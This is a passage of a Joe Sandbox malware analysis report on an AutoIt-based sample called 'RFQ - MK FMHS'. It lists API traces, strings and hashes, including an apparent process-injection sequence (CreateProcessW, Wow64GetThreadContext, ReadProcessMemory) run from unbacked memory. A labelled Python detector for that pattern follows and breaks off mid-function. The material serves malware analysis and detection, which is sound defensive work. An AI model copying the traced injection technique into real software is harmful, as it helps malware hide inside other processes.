                    • __wsplitpath.LIBCMT ref: 00ED94BE
                      • Part of subcall function 00E9432E: __wsplitpath_helper.LIBCMT ref: 00E9436E
                    • _wcscpy.LIBCMT ref: 00ED94D1
                    • _wcscat.LIBCMT ref: 00ED94E4
                    • __wsplitpath.LIBCMT ref: 00ED9509
                    • _wcscat.LIBCMT ref: 00ED951F
                    • _wcscat.LIBCMT ref: 00ED9532
                      • Part of subcall function 00ED922F: _memmove.LIBCMT ref: 00ED9268
                      • Part of subcall function 00ED922F: _memmove.LIBCMT ref: 00ED9277
                    • _wcscmp.LIBCMT ref: 00ED9479
                      • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AAE
                      • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED96DC
                    • _wcsncpy.LIBCMT ref: 00ED974F
                    • DeleteFileW.KERNEL32(?,?), ref: 00ED9785
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ED979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: 116fd77f483f6af37bc402f97a66c8cb8d15d8c42f7ca7a4c3480cc8ac412042
                    • Instruction ID: 7699e4e3aca10e86f840169b7945bb7079b7f4850cebe2bc187841a886f139be
                    • Opcode Fuzzy Hash: 116fd77f483f6af37bc402f97a66c8cb8d15d8c42f7ca7a4c3480cc8ac412042
                    • Instruction Fuzzy Hash: 2BC13AB1A00219AEDF21DFA5CC85ADEB7BDEF44304F0050ABF609F6252DB709A458F65

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E73074
                    • RegisterClassExW.USER32(00000030), ref: 00E7309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                    • LoadIconW.USER32(000000A9), ref: 00E730F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 6944b1e84e88360a527ec5a76e1f3d526333f489d818cae2302e287ab6a323f8
                    • Instruction ID: 7fb288f5673b7d38bdd978c0be6f1779cb9e3cc7cf13fd13588e0ba9ffee0366
                    • Opcode Fuzzy Hash: 6944b1e84e88360a527ec5a76e1f3d526333f489d818cae2302e287ab6a323f8
                    • Instruction Fuzzy Hash: F93137B1940309AFDB00DFA5EC85AEDBBF1FF09320F10852AE640E62A0D7B54585DF91

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E73074
                    • RegisterClassExW.USER32(00000030), ref: 00E7309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                    • LoadIconW.USER32(000000A9), ref: 00E730F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 8b11b46f2f132bd301ac84ef4a9d813926c39211f5d8838a3f365ab1d3db7aa3
                    • Instruction ID: 6109bfe1cc94c647332b866e1c08e0925d62037d2020fa2316996587a689331f
                    • Opcode Fuzzy Hash: 8b11b46f2f132bd301ac84ef4a9d813926c39211f5d8838a3f365ab1d3db7aa3
                    • Instruction Fuzzy Hash: 3221B4B1910218BFDB00DFA5E889AADBBF5FF08710F00812AFA10E62A0D7B14548DF95

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E74864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F362F8,?,00E737C0,?), ref: 00E74882
                      • Part of subcall function 00E9074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E772C5), ref: 00E90771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E77308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EAECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EAED32
                    • RegCloseKey.ADVAPI32(?), ref: 00EAED70
                    • _wcscat.LIBCMT ref: 00EAEDC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 8986ded79af6b0e48b2783649a6dfb2b16e37ea5d4ae828649b7cbb1e54ea6a9
                    • Instruction ID: 116d14316f78556d88a5766d42b493d2722d3f3a4c7fae5a203dfb13135aa68f
                    • Opcode Fuzzy Hash: 8986ded79af6b0e48b2783649a6dfb2b16e37ea5d4ae828649b7cbb1e54ea6a9
                    • Instruction Fuzzy Hash: 48718FB15083059EC724EF65DC818ABB7E9FF89360F40552EF449A72A0DB70D948EF62

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E73A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E73A71
                    • LoadIconW.USER32(00000063), ref: 00E73A88
                    • LoadIconW.USER32(000000A4), ref: 00E73A9A
                    • LoadIconW.USER32(000000A2), ref: 00E73AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E73AD2
                    • RegisterClassExW.USER32(?), ref: 00E73B28
                      • Part of subcall function 00E73041: GetSysColorBrush.USER32(0000000F), ref: 00E73074
                      • Part of subcall function 00E73041: RegisterClassExW.USER32(00000030), ref: 00E7309E
                      • Part of subcall function 00E73041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                      • Part of subcall function 00E73041: InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                      • Part of subcall function 00E73041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                      • Part of subcall function 00E73041: LoadIconW.USER32(000000A9), ref: 00E730F2
                      • Part of subcall function 00E73041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: 4beebcdb7951195551895d3add8bd6e6dfd7237f09ba701e1fb762bc3ab10e41
                    • Instruction ID: 32cb0f9fde377914cb5b5f0c7fb0957c59ff6a57db8f4dde2488bd609477a990
                    • Opcode Fuzzy Hash: 4beebcdb7951195551895d3add8bd6e6dfd7237f09ba701e1fb762bc3ab10e41
                    • Instruction Fuzzy Hash: AB215C70910308BFEF109FA5EC09B9E7BB6EB48720F00812AE504B62A1C3B69554EF94

                    Control-flow Graph
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 00E736D2
                    • KillTimer.USER32(?,00000001), ref: 00E736FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E7371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7372A
                    • CreatePopupMenu.USER32 ref: 00E7373E
                    • PostQuitMessage.USER32(00000000), ref: 00E7375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated
                    • API String ID: 129472671-2362178303
                    • Opcode ID: d2fcac6d9283b3396f06714610a79fbf2956abe3f07a9e38859d863f7ad73057
                    • Instruction ID: 1e59d15232e9185409722a91b5207d92acfb8259b748f56f7823da11592a0152
                    • Opcode Fuzzy Hash: d2fcac6d9283b3396f06714610a79fbf2956abe3f07a9e38859d863f7ad73057
                    • Instruction Fuzzy Hash: 814127B1204109BBDF54AB74DC49BBA3795EB45310F14A12AF50AF62E2DB60EE04F761

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 84fe5a9fd7cba73af8cd82478cc9083dc9d59bd36e4bbc2ebaf094d4eb4ccc7f
                    • Instruction ID: d8331f037464fc50ff4c39766894792de1b1a5f54f7e64b4c0c5b08d9dbd41dc
                    • Opcode Fuzzy Hash: 84fe5a9fd7cba73af8cd82478cc9083dc9d59bd36e4bbc2ebaf094d4eb4ccc7f
                    • Instruction Fuzzy Hash: 05A1527191021DAADF04EBA0CC95DEEB7B8FF14310F44942AF41AB7192DF749A09DB61

                    Control-flow Graph
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E526A1
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E528C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                    • Instruction ID: c3ad46b1307af32a46efc40145b756b94ef924837c0e66e3d59c27791821d177
                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                    • Instruction Fuzzy Hash: 11A11874E00209EBDB14CFE4C894BEEB7B5BF49305F209559EA01BB280D7759A84DB94

                    Control-flow Graph
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E73A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00E73A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00E73A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 4f630cd48d9897f704df224e3f07943aa83cf1902737f0a8cb106d8d7cafc3ef
                    • Instruction ID: 21006b3a961fcc4ca37d08d8feaebfd1399732121fecdd7f09ee4e26f4fd87ef
                    • Opcode Fuzzy Hash: 4f630cd48d9897f704df224e3f07943aa83cf1902737f0a8cb106d8d7cafc3ef
                    • Instruction Fuzzy Hash: D5F030706002987EEF301717AC09E373E7EDBC7F60B01802AF900E21B0C5A55810EA70

                    Control-flow Graph
                    APIs
                      • Part of subcall function 00E522A0: Sleep.KERNELBASE(000001F4), ref: 00E522B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E524C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: A7S7CBWWSP34UEGV
                    • API String ID: 2694422964-130553867
                    • Opcode ID: a6c930ed2f2ad9f6444489d47c964ecf49e5c0dc43d9d26d2a60cba48db6afb1
                    • Instruction ID: eb0ab8261fa2c38e51be9e7517eafbd76323c99ece5413ba9a198a33b0aaa243
                    • Opcode Fuzzy Hash: a6c930ed2f2ad9f6444489d47c964ecf49e5c0dc43d9d26d2a60cba48db6afb1
                    • Instruction Fuzzy Hash: 3A51C530D04249EBEF11DBE4C854BEEBB79AF05305F004599E608BB2C0D7B91B48CBA6

                    Control-flow Graph
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EAD5EC
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    • _memset.LIBCMT ref: 00E7418D
                    • _wcscpy.LIBCMT ref: 00E741E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E741F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: 5be5eb81feb8c39d39a80caf9be4a6e8b09accc4e0f1a8276af3dd97eecb0bd7
                    • Instruction ID: a209671f517f8739eca9c109f65f010f0a7bf23ac379cb33444d633033ac2354
                    • Opcode Fuzzy Hash: 5be5eb81feb8c39d39a80caf9be4a6e8b09accc4e0f1a8276af3dd97eecb0bd7
                    • Instruction Fuzzy Hash: 6231D171409304AADB22EB60EC46BDB77E8AF49314F10D51EF1D9B20E1EB74A648C793

                    Control-flow Graph
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: f1b9c21b29e748ae59e0631ed1cb12cbfcc18e049ad432ebebe53aa9933e7566
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: EA51B332A00B05DBDF268FB9C8846AE77B5AF41324F64972EF825B62D1D7709E518B40
                    APIs
                      • Part of subcall function 00E74F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74F6F
                    • _free.LIBCMT ref: 00EAE68C
                    • _free.LIBCMT ref: 00EAE6D3
                      • Part of subcall function 00E76BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E76D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 0ea99c12abc10b401340319273f148cb9b84611518892e2a2c599459bcf8bf86
                    • Instruction ID: 65e2691ba1eb1b637827e73e4da613e5de256d268d6d78f8e86b531030bf98b4
                    • Opcode Fuzzy Hash: 0ea99c12abc10b401340319273f148cb9b84611518892e2a2c599459bcf8bf86
                    • Instruction Fuzzy Hash: 9C915F71A10219AFCF04EFA4C8919EDB7F4FF19314F14A46AF815BB291EB31A905CB60
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E735A1,SwapMouseButtons,00000004,?), ref: 00E735D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E735A1,SwapMouseButtons,00000004,?,?,?,?,00E72754), ref: 00E735F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,00E735A1,SwapMouseButtons,00000004,?,?,?,?,00E72754), ref: 00E73617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: 7fe7090c547cd38f7ebbde8c767f35deeff099f94af8abca8c003ebc4bb5c2d0
                    • Instruction ID: ce37d46f2f558ec3cb82ae9276af5ed391c3f23f2a73bded6d88e5f28e311d81
                    • Opcode Fuzzy Hash: 7fe7090c547cd38f7ebbde8c767f35deeff099f94af8abca8c003ebc4bb5c2d0
                    • Instruction Fuzzy Hash: BE114871511218BFDB20CFA5DC40DFEB7B8EF44744F1094A9E809E7210E6719E44A760
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00E51A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E51AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E51B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
                    • Instruction ID: 58d40f3099b2c8b781893b615af829f8df99331bbc69af722f341dd2fa98af24
                    • Opcode Fuzzy Hash: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
                    • Instruction Fuzzy Hash: DD621930A14258DBEB24CFA4C841BDEB372EF58301F1095A9D50DFB290E77A9E85CB59
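                    Added example (not code from the Joe Sandbox report, from Joe Sandbox, or from the sample): the three calls above are issued from the region dumped at 00E50000, which the report marks as not PE-backed, whereas the AutoIt runtime's own calls (for instance RegOpenKeyExW at 00E735D4 or CreateFileW at 00ED9B45) come from the image mapped at 00E70000. The Python below turns that observation into a check over an API trace: each call site is attributed to a memory region, and a region is flagged only when it is executable, not image-backed, and the source of every stage of the process-creation / thread-context / foreign-memory-access sequence. The sample regions and calls are constructed from the report's "ref:" and "Memory Dump Source" values; the region sizes, and the reading of 0x40 / 0x20000 as the protection and type fields of the dump file name, are assumptions. The protection and type constants are the standard winnt.h values.

```python
"""Attribute API call sites to memory regions and flag injection primitives
issued from unbacked executable memory.

Added example for this report, not code from Joe Sandbox or from the sample.
SAMPLE_REGIONS and SAMPLE_CALLS are constructed from the report's "ref:" and
"Memory Dump Source" values; region sizes are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Memory protection and type constants from winnt.h.
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTABLE_MASK = (PAGE_EXECUTE | PAGE_EXECUTE_READ
                   | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000


@dataclass(frozen=True)
class Region:
    base: int
    size: int
    protect: int
    mem_type: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE


@dataclass(frozen=True)
class ApiCall:
    caller: int  # address of the call site (the report's "ref:" column)
    api: str


# One set per stage of the primitive; a region is flagged only when it is the
# source of at least one API from every stage.
INJECTION_STAGES: Tuple[Set[str], ...] = (
    {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    {"Wow64GetThreadContext", "GetThreadContext"},
    {"ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory"},
)


def region_for(addr: int, regions: Iterable[Region]) -> Optional[Region]:
    """Return the region containing addr, or None if it is unmapped."""
    for region in regions:
        if region.contains(addr):
            return region
    return None


def find_injection_from_unbacked_memory(
    calls: Iterable[ApiCall], regions: Iterable[Region]
) -> List[Tuple[Region, List[str]]]:
    """Group calls by source region, keep executable non-image regions, and
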